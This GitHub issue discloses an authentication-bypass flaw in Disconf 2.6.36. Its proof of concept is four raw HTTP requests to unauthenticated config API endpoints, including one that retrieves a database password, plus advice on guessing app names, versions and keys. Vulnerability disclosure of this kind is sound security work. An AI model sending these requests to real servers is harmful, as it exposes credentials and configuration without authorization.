Skip to content

Improper permission management allowing unauthorized users to access sensitive configuration information #431

New issue
New issue
Open
Open
Improper permission management allowing unauthorized users to access sensitive configuration information#431
@gaogaostone

Description

@gaogaostone
gaogaostone
opened on Oct 23, 2024

The Disconf of version 2.6.36 has improper permission management, allowing unauthorized users to access sensitive configuration information stored in the configuration center.

Proof on Concept:

1) Access the /api/config/list without authentication to retrieve all the parameters and their values for a particular app in a particular env with particular version.
Send the request as following without cookie or token, and it responses the parameters and their values.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention.

GET /api/config/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

2) Access the /api/config/simple/list without authentication to retrieve all the parameters for a particular app in a particular env with particular version. This interface only returns the parameter without values.
Send the request as following without cookie or token, and it responses the parameters.
The request is sent with three parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention.

GET /api/config/simple/list?app=demo1&env=online&version=1.0 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

3) Access the /api/config/item without authentication to retrieve values for a particular app’s particular parameter in a particular env with particular version.
Send the request as following without cookie or token, and it responses the values for a particular parameter.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention. The fourth parameter is the key of the parameter and it can be guessed by naming convention.

GET /api/config/item?app=demo1&env=online&version=1.0&key=jdbc.db_0.password HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

4) Access the /api/config/file without authentication to retrieve the content of parameter file for a particular app in a particular env with particular version.
Send the request as following without cookie or token, and it responses the content of parameter file.
The request is sent with four parameters. The first parameter is app, aka the product name, and it may be guessed and brute-forced. The second parameter is env, and it is fixed in the platform with four values: rd, qa, local and online. The third parameter is version and it can be guessed by naming convention. The fourth parameter is the parameter file’s name, and it can be guessed by naming convention.

GET /api/config/file?app=demo1&env=online&version=1.0&key=spring-cache.properties HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://x.x.x.x/main.html
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions